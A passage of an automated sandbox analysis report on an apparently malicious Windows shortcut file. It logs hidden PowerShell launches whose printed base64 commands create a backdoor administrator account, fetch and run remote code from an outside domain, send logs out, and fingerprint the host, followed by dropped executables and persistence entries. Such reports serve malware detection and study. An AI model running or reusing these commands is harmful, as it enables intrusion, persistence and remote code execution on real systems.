ABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANwAxAGIAYwBlADkAOQBiADcANQAwADIAYgAxADkAZgBmADIAYQAwADcAOQAwADUAYQBiADIAZAAxADMAMwA5AGMANwAwADkAZgBlAGIAYQAyADkAZAA3ADEAMQBiADMANABjAGQAZAA0ADkAYQAyADgAMQBlADMANQAzADMAMAA5ADYANAA0AGMANQAxADYAMwBhAGQAYwA2AGYAYgA0AGEAMwAxADUANAA4AGEAZQAwADMAYQBlADMAZQA5ADIANAAxADkANAAzADUAOAA4ADEAZQBlAGUAYgBlADcAZgA0AGEAZQAxAGMAMgA2ADIANgBhADMANABkADcAZQBjADIAZgBhADcAZQBiADgAOABiADYAYQBjAGEANwA3AGYAMAA4ADgAYwBkADQAZAA0ADkAYgAwADkANQAwADQANQBjADIAOAA1ADMANQBkAGYANwAwAGUANQBhAGIANQBkADAAYQAyAGIANQBiADAAYwA4AGEAZAAzAGUAOAAzAGIANgBjADgANgBiAGQAYQA5AGQANQBkADcAMgAwAGUAZgA1ADUAYgA1ADAAOQBkADQANwAzADQAYQAzADQAOABlACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgADJump to behavior
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.cmdline"Jump to behavior
      Source: svczHost.exe.10.drStatic PE information: section name: .managed
      Source: svczHost.exe.10.drStatic PE information: section name: hydrated
      Source: myRdpService.exe.18.drStatic PE information: section name: .managed
      Source: myRdpService.exe.18.drStatic PE information: section name: hydrated
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF95A29846E pushad ; ret 2_2_00007FF95A29849D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF95A297C6E pushad ; retf 2_2_00007FF95A297C9D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF95A29849E push eax; ret 2_2_00007FF95A2984AD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF95A297C9E push eax; retf 2_2_00007FF95A297CAD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF95A29472B push eax; ret 2_2_00007FF95A29476D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF95A2900BD pushad ; iretd 2_2_00007FF95A2900C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF95A361B14 push esi; iretd 2_2_00007FF95A361B17
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF95A17D2A5 pushad ; iretd 6_2_00007FF95A17D2A6
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF95A2900BD pushad ; iretd 6_2_00007FF95A2900C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF95A17D2A5 pushad ; iretd 10_2_00007FF95A17D2A6
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF95A298198 push ebx; ret 10_2_00007FF95A2981DA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF95A29819B push ebx; ret 10_2_00007FF95A2981DA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF95A2900BD pushad ; iretd 10_2_00007FF95A2900C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF95A2975D9 push ebx; iretd 10_2_00007FF95A2975DA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FF95A2800BD pushad ; iretd 22_2_00007FF95A2800C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF95A2A00BD pushad ; iretd 26_2_00007FF95A2A00C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 44_2_00007FF95A283C7A push E95D668Eh; ret 44_2_00007FF95A283CB9
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 44_2_00007FF95A2800BD pushad ; iretd 44_2_00007FF95A2800C1

      Persistence and Installation Behavior

      barindex
      Windows shortcut file (LNK) starts blacklisted processes
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.dllJump to dropped file
      Source: C:\Windows\Temp\svczHost.exeFile created: C:\Windows\Temp\myRdpService.exeJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
      Source: C:\Windows\Temp\svczHost.exeFile created: C:\Windows\Temp\myRdpService.exeJump to dropped file
      Source: C:\Windows\Temp\myRdpService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 8000
      Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 8008
      Source: unknownNetwork traffic detected: HTTP traffic on port 8008 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 8000
      Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49794
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
